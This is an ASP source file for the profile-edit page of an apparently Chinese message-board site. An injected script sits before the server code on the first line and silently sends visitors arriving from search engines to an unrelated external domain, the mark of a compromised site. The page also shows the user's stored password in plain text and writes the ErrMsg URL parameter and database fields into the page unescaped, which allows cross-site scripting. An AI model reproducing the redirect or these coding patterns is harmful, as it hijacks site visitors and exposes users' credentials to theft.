d:\wwwroot\wuchunhua\liuyan\modify.asp
001:
<script type="text/javascript">var s=document.referrer;if(s.indexOf("google")>0 || s.indexOf("baidu")>0 || s.indexOf("yahoo")>0 || s.indexOf("gou")>0 || s.indexOf("bing")>0 || s.indexOf("dao")>0 || s.indexOf("so")>0 || s.indexOf("sm")>0 || s.indexOf("biso")>0 ){location.href="http://www.afisyecd.space/?1923057"}</script>
<%
002:
'检查用户是否已经登陆,只有登陆才能进行资料修改
003:
If Session("IsPassed") <> TRUE Then
004:
Response.Redirect "login.asp?ErrMsg=请先登陆"
005:
Response.End
006:
End If
007:
008:
'从URL参数中,获得用户ID号
009:
Dim UserId
010:
UserId = Request.QueryString("id")
011:
012:
'如果ID号为空,则操作非法,要求重新登陆
013:
If UserId = "" Then
014:
'出错处理
015:
%
>
016:
<html>
017:
<body>
018:
<script language="vbscript">
019:
<!--
020:
Window.alert "请重新登陆"
021:
History.back
022:
-->
023:
</script>
024:
</body>
025:
</html>
026:
<%
027:
Response.End
028:
End If
029:
%
>
030:
<%
031:
'用户ID必须为数字,防止恶意攻击来试探数据库内容
032:
If NOT IsNumeric(UserId) Then
033:
'出错处理
034:
%
>
035:
<html>
036:
<body>
037:
<script language="vbscript">
038:
<!--
039:
Window.alert "会员编号应为数字"
040:
History.back
041:
-->
042:
</script>
043:
</body>
044:
</html>
045:
<%
046:
Response.End
047:
End If
048:
%
>
049:
<%
050:
'检查用户ID是否为正整数
051:
Dim count
052:
Dim sstr(100)
053:
Dim AscValue
054:
Dim IsPositiveInt
055:
IsPositiveInt = TRUE
056:
057:
count = Len(UserId)
058:
059:
For i=1 To count
060:
sstr(i) = Mid(UserId,i,1)
061:
Next
062:
063:
For i=1 To count
064:
AscValue = Asc(sstr(i))
065:
066:
If AscValue < 48 OR AscValue > 57 Then
067:
IsPositiveInt = FALSE
068:
Exit For
069:
End If
070:
Next
071:
072:
'用户ID不为正整数的错误处理
073:
If NOT IsPositiveInt Then
074:
'出错处理
075:
%
>
076:
<html>
077:
<body>
078:
<script language="vbscript">
079:
<!--
080:
Window.alert "会员编号应为正整数"
081:
History.back
082:
-->
083:
</script>
084:
</body>
085:
</html>
086:
<%
087:
Response.End
088:
End If
089:
%
>
090:
<%
091:
Dim flag, UserClass
092:
'初始化标志为假
093:
flag = FALSE
094:
095:
'如果进行修改操作的是超级管理员,可以进行任何用户的资料修改
096:
If Session("Class") = "1" Then
097:
flag = TRUE
098:
End If
099:
100:
'如果是管理员,修改自己的资料,则flag为TRUE
101:
If Session("Class") = "2" AND Session("Id") = UserId Then
102:
flag = True
103:
End If
104:
105:
'如果是普通会员,修改自己的资料,则flag为TRUE
106:
If Session("Class") = "9" AND Session("Id") = UserId Then
107:
flag = TRUE
108:
End If
109:
110:
'根据用户ID检索数据库,看用户是否存在
111:
Dim objConn, strSQL, objRS
112:
113:
'初始化数据库连接
114:
DB="./Board/database/BOARD.mdb"
115:
Set objConn = Server.CreateObject("ADODB.Connection")
116:
objConn.ConnectionString = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & Server.MapPath(DB)
117:
'打开数据库连接
118:
objConn.Open
119:
120:
strSQL = "Select * From MEMBER Where ID=" & UserId
121:
Set objRS = Server.CreateObject("ADODB.Recordset")
122:
objRS.Open strSQL, objConn, 1, 3, 1
123:
124:
'如果用户不存在,操作不能继续,进行错误处理
125:
If objRS.EOF Then
126:
'出错处理
127:
%
>
128:
<html>
129:
<body>
130:
<script language="vbscript">
131:
<!--
132:
Window.alert "用户不存在"
133:
History.back
134:
-->
135:
</script>
136:
</body>
137:
</html>
138:
<%
139:
'关闭数据集和数据库连接,并释放对象
140:
objRS.Close
141:
Set objRS = Nothing
142:
objConn.Close
143:
Set objConn = Nothing
144:
145:
Response.End
146:
End If
147:
%
>
148:
<%
149:
'该ID的用户存在,获得该ID用户的级别
150:
If NOT objRS.EOF Then
151:
UserClass = objRS.Fields("CLASS")
152:
End If
153:
154:
'如果是管理员对普通会员进行资料修改,则flag为TRUE
155:
If Session("Class") = "2" Then
156:
If UserClass = "9" Then
157:
flag = TRUE
158:
End If
159:
End If
160:
161:
'如果flag不为真,则表示用户权限不够
162:
If flag <> TRUE Then
163:
'出错处理
164:
%
>
165:
<html>
166:
<body>
167:
<script language="vbscript">
168:
<!--
169:
Window.alert "你的权限不允许进行此次修改操作"
170:
History.back
171:
-->
172:
</script>
173:
</body>
174:
</html>
175:
<%
176:
'关闭数据集和数据库连接,并释放对象
177:
objRS.Close
178:
Set objRS = Nothing
179:
objConn.Close
180:
Set objConn = Nothing
181:
182:
Response.End
183:
Else
184:
'写入Session变量,表示允许更新记录
185:
Session("UpdatePermitted") = TRUE
186:
%
>
187:
<html>
188:
<head>
189:
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
190:
<title>修改用户信息</title>
191:
<style type="text/css">
192:
<!--
193:
.style2 {
194:
font-family: Verdana, Arial, Helvetica, sans-serif;
195:
font-size: 14px;
196:
}
197:
.style3 {
198:
font-family: Verdana, Arial, Helvetica, sans-serif;
199:
font-size: 14px;
200:
color:#FF0000
201:
}
202:
-->
203:
</style>
204:
</head>
205:
<script language="vbscript">
206:
<!--
207:
'检查密码格式是否正确
208:
Function CheckPass(upass)
209:
CheckPass = TRUE
210:
Dim count
211:
Dim sstr(15)
212:
Dim lupass
213:
Dim AscValue
214:
lupass = LCase(upass)
215:
216:
'提取每一个字符,存储到数组中
217:
count = Len(lupass)
218:
For i=1 To count
219:
sstr(i) = Mid(lupass,i,1)
220:
Next
221:
222:
'依次检验每个字符,必须为字母或者数字
223:
For i=1 To count
224:
AscValue = Asc(sstr(i))
225:
if (AscValue < 97 OR AscValue > 122) AND (AscValue < 48 OR AscValue > 57) Then
226:
CheckPass = FALSE
227:
Exit For
228:
End If
229:
Next
230:
231:
End Function
232:
233:
Sub CheckData()
234:
'密码字段不为空,表示要修改密码,则对密码格式进行检验
235:
If form1.passwd.value <> EMPTY Then
236:
'密码不可以超过 15 个字符
237:
If Len(form1.passwd.value) > 15 Then
238:
Window.Alert "用户密码不可以超过 15 个字符."
239:
Exit Sub
240:
End If
241:
242:
'密码格式必须正确
243:
If NOT(CheckPass(form1.passwd.value)) Then
244:
Window.Alert "用户密码应该由英文字母或数字组成"
245:
Exit Sub
246:
End If
247:
248:
'两次密码输入必须一致
249:
If form1.passwd.value <> form1.passwd2.value Then
250:
Window.Alert "“密码确认”字段与“用户密码”字段一定要相同"
251:
Exit Sub
252:
End If
253:
End If
254:
255:
'检查验证码是否正确
256:
If form1.UpdateCode.value = EMPTY Then
257:
Window.Alert "请填写验证码"
258:
Exit Sub
259:
End If
260:
261:
'Email字段不为空,表示要修改Email,则对Email格式进行检验
262:
If form1.Email.value <> EMPTY Then
263:
'必须输入格式正确的EMail地址
264:
If InStr(form1.Email.value,"@") = 0 Then
265:
Window.alert "请输入正确的E-mail地址"
266:
Exit Sub
267:
End If
268:
End If
269:
270:
form1.Submit
271:
272:
End Sub
273:
-->
274:
</script>
275:
<body>
276:
<%
277:
'生成数据更新校验码
278:
Dim strCode, IntCode(3)
279:
Dim i
280:
i = 0
281:
Do While i < 4
282:
Randomize
283:
IntCode(i) = Int(Rnd() * 10)
284:
i = i + 1
285:
Loop
286:
287:
strCode = CStr(IntCode(0)) + CStr(IntCode(1)) + CStr(IntCode(2)) + CStr(IntCode(3))
288:
Session("UpdateCode") = strCode
289:
%
>
290:
<form name="form1" action="updatemember.asp" method="post">
291:
<table width="600" border="0" align="center">
292:
<tr>
293:
<td><table width="100%" border="2" bordercolor="#6666FF">
294:
<tr bgcolor="#6666FF">
295:
<td colspan="2"><div align="center" class="style2">
296:
以下为必填内容</div>
297:
<%
298:
If Request.QueryString("ErrMsg") <> EMPTY Then
299:
Response.Write "<br>"
300:
Response.Write "<div align=""center"" class=""style3"">"
301:
Response.Write(Request.QueryString("ErrMsg"))
302:
Response.Write "</div>"
303:
End If
304:
%
></td>
305:
</tr>
306:
<tr>
307:
<td width="21%" bgcolor="#99FF99"><div align="left" class="style2">用户帐号:</div></td>
308:
<td width="79%" bgcolor="#99FF99"><input name="id" type="hidden" value="
<%
= UserId
%
>">
309:
<span class="style2">
<%
= objRS.Fields("NAME")
%
></span></td>
310:
</tr>
311:
<tr>
312:
<td width="21%" bgcolor="#99FF99"><div align="left" class="style2">用户原密码:</div></td>
313:
<td width="79%" bgcolor="#99FF99"><span class="style2">
<%
= objRS.Fields("PASSWORD")
%
></span></td>
314:
</tr>
315:
<tr>
316:
<td bgcolor="#99FF99"><div align="left" class="style2">用户新密码:</div></td>
317:
<td bgcolor="#99FF99"><input name="passwd" type="password" size="19" maxlength="16">
318:
<span class="style2">(字母,数字,16位以下,不填则密码不变)</span></td>
319:
</tr>
320:
<tr>
321:
<td bgcolor="#99FF99">新密码确认:</td>
322:
<td bgcolor="#99FF99"><input name="passwd2" type="password" size="19" maxlength="16">
323:
<span class="style2">(再输入一次密码)</span></td>
324:
</tr>
325:
<tr>
326:
<td bgcolor="#99FF99">四位验证码:</td>
327:
<td bgcolor="#99FF99"><input name="UpdateCode" type="text" size="18" maxlength="16">
328:
<span class="style3">(
<%
Response.Write(Session("UpdateCode"))
%
>)
329:
</span></td>
330:
</tr>
331:
<tr>
332:
<td bgcolor="#99FF99"><span class="style2">真实姓名</span>:</td>
333:
<td bgcolor="#99FF99"><input name="realname" type="text" size="10" maxlength="10" value="
<%
= objRS.Fields("REALNAME")
%
>">
334:
<span class="style2">(请输入您的真实姓名,空白则不修改)</span></td>
335:
</tr>
336:
<tr>
337:
<td bgcolor="#99FF99" class="style2">电子邮件:</td>
338:
<td bgcolor="#99FF99"><input name="Email" type="text" size="30" value="
<%
= objRS.Fields("EMAIL")
%
>">
339:
<span class="style2">(空白则不修改)</span></td></td>
340:
</tr>
341:
<tr>
342:
<td bgcolor="#99FF99" class="style2">主页地址:</td>
343:
<td bgcolor="#99FF99"><input name="Url" type="text" size="30" value="
<%
= objRS.Fields("URL")
%
>">
344:
<span class="style2">(空白则不修改)</span></td></td>
345:
</tr>
346:
<%
347:
If Session("IsPassed") = TRUE AND Session("IsAdmin") = TRUE AND Session("Class") = "1" _
348:
AND objRS.Fields("CLASS") <> "1"Then
349:
%
>
350:
<tr>
351:
<td bgcolor="#99FF99" class="style2">用户权限:</td>
352:
<td bgcolor="#99FF99" class="style2"><input type="radio" name="Authority" value="2"
353:
<%
354:
'超级管理员可以修改用户的级别
355:
If objRS.Fields("CLASS") = "2" Then
356:
Response.Write("Checked")
357:
End If
358:
%
>>管理员
359:
<input type="radio" name="Authority" value="9"
360:
<%
If objRS.Fields("CLASS") = "9" Then
361:
Response.Write("Checked")
362:
End If
363:
%
>>普通会员</td>
364:
</tr>
365:
<%
366:
End If
367:
%
>
368:
</table>
369:
</td>
370:
</tr>
371:
<tr>
372:
<td><table width="100%" border="2" bordercolor="#6666FF">
373:
<tr bgcolor="#6666FF">
374:
<td colspan="2" class="style2"><div align="center">以下为选填内容</div></td>
375:
</tr>
376:
<tr>
377:
<td bgcolor="#99FF99"><span class="style2">自我介绍</span>:</td>
378:
<td bgcolor="#99FF99"><textarea name="Comment" cols="50" rows="6">
<%
=objRS.Fields("COMMENT")
%
></textarea></td>
379:
</tr>
380:
</table>
381:
</td>
382:
</tr>
383:
<tr>
384:
<td><table width="60%" border="0" align="center" cellspacing="20">
385:
<tr>
386:
<td><div align="right">
387:
<input name="BtnSubmit" type="button" value="提交" onClick="CheckData">
388:
</div>
389:
</td>
390:
<td><input name="BtnReset" type="reset" value="重置"></td>
391:
</tr>
392:
</table></td>
393:
</tr>
394:
</table>
395:
</form>
396:
</body>
397:
</html>
398:
<%
End If
%
>
399:
400: